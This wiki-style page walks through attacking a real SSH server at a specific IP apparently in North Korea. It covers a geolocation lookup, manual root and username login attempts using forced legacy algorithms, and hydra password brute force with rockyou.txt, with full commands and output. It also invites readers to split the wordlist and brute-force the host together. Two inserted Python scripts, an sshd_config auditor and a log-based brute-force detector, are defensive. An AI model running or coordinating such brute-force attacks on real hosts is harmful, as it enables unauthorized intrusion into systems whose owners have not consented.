It is recommended to read the previous wiki page [[norcorea:nmap|]] first to understand this one better.

hydra@kp:~$ mmdblookup --file Descargas/maxmind/GeoLite2-City.mmdb --ip 175.45.178.129
{
  "continent": {
    "code": "AS"
    "geoname_id": 6255147
    "names": {
      "de": "Asien"
      "en": "Asia"
      "es": "Asia"
      "fr": "Asie"
      "ja": "アジア"
      "pt-BR": "Ásia"
      "ru": "Азия"
      "zh-CN": "亚洲"
    }
  }
  "country": {
    "geoname_id": 1873107
    "iso_code": "KP"
    "names": {
      "de": "Nordkorea"
      "en": "North Korea"
      "es": "Corea del Norte"
      "fr": "Corée du Nord"
      "ja": "韓国、朝鮮民主主義人民共和国"
      "pt-BR": "Coreia do Norte"
      "ru": "КНДР"
      "zh-CN": "朝鲜"
    }
  }
  "location": {
    "accuracy_radius": 50
    "latitude": 40.000000
    "longitude": 127.000000
    "time_zone": "Asia/Pyongyang"
  }
  "registered_country": {
    "geoname_id": 1873107
    "iso_code": "KP"
    "names": {
      "de": "Nordkorea"
      "en": "North Korea"
      "es": "Corea del Norte"
      "fr": "Corée du Nord"
      "ja": "韓国、朝鮮民主主義人民共和国"
      "pt-BR": "Coreia do Norte"
      "ru": "КНДР"
      "zh-CN": "朝鲜"
    }
  }
}

hydra@kp:~$ mmdblookup --file Descargas/maxmind/GeoLite2-City.mmdb --ip 175.45.178.129 | grep -oE '[0-9]{1,3}\.[0-9]{6}'
40.000000
127.000000

The physical host is located 2.15 km from the nearest road. (Note that the record's accuracy_radius is 50 km and the coordinates are round numbers, so this is a country-level approximation rather than a precise location.)

hydra@kp:~$ ssh root@175.45.178.129
Unable to negotiate with 175.45.178.129 port 22: no matching key exchange method found.
Their offer: diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1
hydra@kp:~$

To establish the connection we must explicitly enable a legacy algorithm (the server only offers SHA-1 based key exchange, which current OpenSSH clients disable by default):

hydra@kp:~$ ssh -o HostKeyAlgorithms=+ssh-rsa -o PubkeyAcceptedAlgorithms=+ssh-rsa -o KexAlgorithms=+diffie-hellman-group14-sha1 -o Ciphers=+aes128-cbc,3des-cbc,aes192-cbc,aes256-cbc root@175.45.178.129
(root@175.45.178.129) Password:
(root@175.45.178.129) Password:
(root@175.45.178.129) Password:
root@175.45.178.129's password:
Connection closed by 175.45.178.129 port 22

As we can see, it does not require key-based authentication that would restrict logins to recognised clients, so anyone can attempt a brute-force attack. It allows a maximum of 4 attempts and then closes the connection, which is the usual default; but, as we will see later, hydra gets around this (the limit applies per connection, and hydra simply opens a new one).

hydra@kp:~$ ssh -o HostKeyAlgorithms=+ssh-rsa -o PubkeyAcceptedAlgorithms=+ssh-rsa -o KexAlgorithms=+diffie-hellman-group14-sha1 -o Ciphers=+aes128-cbc,3des-cbc,aes192-cbc,aes256-cbc corea@175.45.178.129
(corea@175.45.178.129) Password:
(corea@175.45.178.129) Password:

A corea user too? We press Ctrl+C.

hydra@kp:~$ ssh -o HostKeyAlgorithms=+ssh-rsa -o PubkeyAcceptedAlgorithms=+ssh-rsa -o KexAlgorithms=+diffie-hellman-group14-sha1 -o Ciphers=+aes128-cbc,3des-cbc,aes192-cbc,aes256-cbc kp@175.45.178.129
(kp@175.45.178.129) Password:

kp? We press Ctrl+C.

hydra@kp:~$ ssh -o HostKeyAlgorithms=+ssh-rsa -o PubkeyAcceptedAlgorithms=+ssh-rsa -o KexAlgorithms=+diffie-hellman-group14-sha1 -o Ciphers=+aes128-cbc,3des-cbc,aes192-cbc,aes256-cbc nhzx@175.45.178.129
(nhzx@175.45.178.129) Password:

We can see that the server prompts for a password even when the username does not exist (as on all GNU/Linux distributions); this makes the brute-force attack harder because we cannot tell which usernames are valid.
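The server above offers only SHA-1 based key exchange methods, needs CBC ciphers enabled on the client, and lets root authenticate with a password. As an added example (not code from the original page), the following Python script audits an sshd_config text for exactly those settings, so an administrator can check their own hosts for the same exposure. Both configurations it inspects are constructed for illustration and are not the real configuration of any host on this page.

```python
"""Audit an sshd_config for the weaknesses seen in the SSH session above.

Added example: parses sshd_config text and reports root password logins,
password authentication, SHA-1 key exchange and CBC ciphers. Both sample
configurations below are constructed for illustration.
"""
import re

# Constructed sample that mirrors what the server offered: SHA-1 DH key
# exchange, CBC ciphers and root logging in with a password.
WEAK_CONFIG = """\
Port 22
PermitRootLogin yes
PasswordAuthentication yes
KexAlgorithms diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1
Ciphers aes128-cbc,3des-cbc,aes192-cbc,aes256-cbc
MaxAuthTries 4
"""

# Constructed hardened counterpart: keys only, no root, modern algorithms.
HARDENED_CONFIG = """\
Port 22
PermitRootLogin no
PasswordAuthentication no
PubkeyAuthentication yes
KexAlgorithms curve25519-sha256,diffie-hellman-group16-sha512
Ciphers chacha20-poly1305@openssh.com,aes256-gcm@openssh.com
MaxAuthTries 3
"""

# SHA-1 based key exchange methods; the three the server offered are all here.
LEGACY_KEX = {
    "diffie-hellman-group1-sha1",
    "diffie-hellman-group14-sha1",
    "diffie-hellman-group-exchange-sha1",
}


def parse_sshd_config(text):
    """Map lowercased keyword -> value. sshd honours the first occurrence of a
    keyword, so later duplicates are ignored; comments and blanks are skipped."""
    cfg = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        # Directives are written "Keyword value" or "Keyword=value".
        parts = re.split(r"\s*=\s*|\s+", line, maxsplit=1)
        if len(parts) == 2:
            cfg.setdefault(parts[0].lower(), parts[1].strip())
    return cfg


def _csv(cfg, key):
    """Split a comma-separated directive value into a list of items."""
    return [item.strip() for item in cfg.get(key, "").split(",") if item.strip()]


def audit_sshd_config(text):
    """Return a list of (keyword, finding) tuples; empty when nothing is flagged."""
    cfg = parse_sshd_config(text)
    findings = []
    # OpenSSH defaults: PermitRootLogin prohibit-password, PasswordAuthentication yes.
    if cfg.get("permitrootlogin", "prohibit-password").lower() == "yes":
        findings.append(("PermitRootLogin",
                         "root can log in with a password; use prohibit-password or no"))
    if cfg.get("passwordauthentication", "yes").lower() == "yes":
        findings.append(("PasswordAuthentication",
                         "password logins accepted, so guessing is possible; prefer keys only"))
    legacy = [k for k in _csv(cfg, "kexalgorithms") if k in LEGACY_KEX]
    if legacy:
        findings.append(("KexAlgorithms", "SHA-1 key exchange offered: " + ",".join(legacy)))
    cbc = [c for c in _csv(cfg, "ciphers") if c.endswith("-cbc")]
    if cbc:
        findings.append(("Ciphers", "CBC-mode ciphers offered: " + ",".join(cbc)))
    return findings


if __name__ == "__main__":
    for name, text in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        result = audit_sshd_config(text)
        print(f"[{name}] {len(result)} finding(s)")
        for key, msg in result:
            print(f"  {key}: {msg}")
```

Run it against `/etc/ssh/sshd_config` by reading the file into `audit_sshd_config`; on a host like the one above it reports all four findings, on the hardened sample it reports none. The parser deliberately keeps only the first occurrence of each keyword, because that is what sshd itself does, so a hardening line appended below an earlier permissive one would correctly still be flagged.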
One option is to use rockyou.txt for both the login and the password, but since having a root user is the norm we will keep it simple. With hydra it is not necessary to specify any algorithm to establish the connection.

We download rockyou.txt with wget https://github.com/brannondorsey/naive-h...ockyou.txt

hydra -l root -P Descargas/rockyou.txt ssh://175.45.178.129
Hydra v9.2 © 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-12-16 17:06:36
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task
[DATA] attacking ssh://175.45.178.129:22/
[STATUS] 449.00 tries/min, 449 tries in 00:01h, 14343982 to do in 532:27h, 16 active
[STATUS] 214.67 tries/min, 644 tries in 00:03h, 14343787 to do in 1113:39h, 16 active
[STATUS] 196.57 tries/min, 1376 tries in 00:07h, 14343055 to do in 1216:07h, 16 active
[STATUS] 204.33 tries/min, 3065 tries in 00:15h, 14341366 to do in 1169:47h, 16 active
[STATUS] 227.48 tries/min, 7052 tries in 00:31h, 14337379 to do in 1050:26h, 16 active
[STATUS] 216.09 tries/min, 10156 tries in 00:47h, 14334275 to do in 1105:37h, 16 active

The same, but also using rockyou.txt as the dictionary for the login:

hydra@kp:~$ hydra -l Descargas/rockyou.txt -P Descargas/rockyou.txt ssh://175.45.178.129
Hydra v9.2 © 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-12-16 18:54:16
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344398 login tries (l:1/p:14344398), ~896525 tries per task
[DATA] attacking ssh://175.45.178.129:22/
[STATUS] 569.00 tries/min, 569 tries in 00:01h, 14343862 to do in 420:09h, 16 active
[STATUS] 394.00 tries/min, 1182 tries in 00:03h, 14343249 to do in 606:45h, 16 active

Note that hydra's lowercase -l takes a single literal login string, while a file of logins is passed with uppercase -L; the l:1 in the [DATA] line above shows that only one login was actually tried in this run.

As we can see it works, and it gets past the 4-attempt limit we hit when connecting manually.

It would be faster, more efficient and more interesting to join forces by splitting rockyou.txt into several parts so that together we could find the password and the user.
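The 4-attempt limit that closed the manual session is sshd's per-connection MaxAuthTries, which is why a tool that simply reconnects is not slowed down by it; on the defending side, detection therefore has to aggregate failures per source address across connections rather than per session. As an added example (not part of the original page), the following Python script does that over constructed sshd log lines written in sshd's usual syslog format; the addresses in them are documentation ranges, not the host discussed on this page.

```python
"""Spot SSH password brute force that reconnects past MaxAuthTries.

Added example: aggregates sshd "Failed password" events per source IP across
connections, so a client that opens a new connection every few guesses is
still caught. The log lines are constructed in sshd's usual syslog format.
"""
import re
from collections import defaultdict

# Constructed sample log (documentation addresses). The first connection is cut
# by sshd after 4 failures; the client then keeps going on new connections.
SAMPLE_LOG = """\
Dec 16 17:06:40 kp sshd[2101]: Failed password for root from 203.0.113.7 port 50112 ssh2
Dec 16 17:06:41 kp sshd[2101]: Failed password for root from 203.0.113.7 port 50112 ssh2
Dec 16 17:06:42 kp sshd[2101]: Failed password for root from 203.0.113.7 port 50112 ssh2
Dec 16 17:06:43 kp sshd[2101]: Failed password for root from 203.0.113.7 port 50112 ssh2
Dec 16 17:06:43 kp sshd[2101]: Disconnecting authenticating user root 203.0.113.7 port 50112: Too many authentication failures [preauth]
Dec 16 17:06:44 kp sshd[2102]: Failed password for root from 203.0.113.7 port 50114 ssh2
Dec 16 17:06:45 kp sshd[2102]: Failed password for root from 203.0.113.7 port 50114 ssh2
Dec 16 17:06:46 kp sshd[2103]: Failed password for root from 203.0.113.7 port 50116 ssh2
Dec 16 17:06:47 kp sshd[2104]: Failed password for invalid user corea from 203.0.113.7 port 50118 ssh2
Dec 16 17:06:48 kp sshd[2105]: Failed password for invalid user kp from 203.0.113.7 port 50120 ssh2
Dec 16 17:10:02 kp sshd[2150]: Failed password for alice from 198.51.100.20 port 40000 ssh2
Dec 16 17:10:30 kp sshd[2151]: Accepted publickey for alice from 198.51.100.20 port 40002 ssh2: ED25519 SHA256:constructedfingerprint
"""

# sshd[pid]: Failed password for [invalid user ]USER from IP port PORT
FAILED = re.compile(
    r"sshd\[(?P<pid>\d+)\]: Failed password for (?P<invalid>invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port (?P<port>\d+)"
)


def summarize_failures(log_text):
    """Per source IP: total failures, failures per connection, users tried."""
    per_ip = defaultdict(lambda: {
        "failures": 0,
        "per_connection": defaultdict(int),  # (pid, client port) -> failures
        "users": set(),
        "invalid_users": set(),
    })
    for line in log_text.splitlines():
        m = FAILED.search(line)
        if not m:
            continue
        rec = per_ip[m["ip"]]
        rec["failures"] += 1
        # A new sshd child pid plus a new client port means a new TCP connection.
        rec["per_connection"][(m["pid"], m["port"])] += 1
        rec["users"].add(m["user"])
        if m["invalid"]:
            rec["invalid_users"].add(m["user"])
    return per_ip


def find_brute_force(log_text, threshold=5):
    """Return alerts for sources whose total failures reach `threshold`,
    however many connections they were spread over, most failures first."""
    alerts = []
    for ip, rec in summarize_failures(log_text).items():
        if rec["failures"] < threshold:
            continue
        alerts.append({
            "source": ip,
            "failures": rec["failures"],
            "connections": len(rec["per_connection"]),
            "max_failures_per_connection": max(rec["per_connection"].values()),
            "users": sorted(rec["users"]),
            "invalid_users": sorted(rec["invalid_users"]),
        })
    return sorted(alerts, key=lambda a: -a["failures"])


if __name__ == "__main__":
    for a in find_brute_force(SAMPLE_LOG):
        print(f"{a['source']}: {a['failures']} failures over {a['connections']} connections "
              f"(max {a['max_failures_per_connection']} per connection), "
              f"users {a['users']}, invalid users {a['invalid_users']}")
```

On the sample the guessing source shows 9 failures spread over 5 connections with never more than 4 per connection, which is exactly the pattern a per-session limit cannot see; the `invalid_users` field also surfaces the guesses against non-existent accounts that the server itself hides by prompting for a password anyway. In practice this aggregation is what tools such as fail2ban or sshguard do before blocking the source, and it complements rather than replaces disabling password authentication.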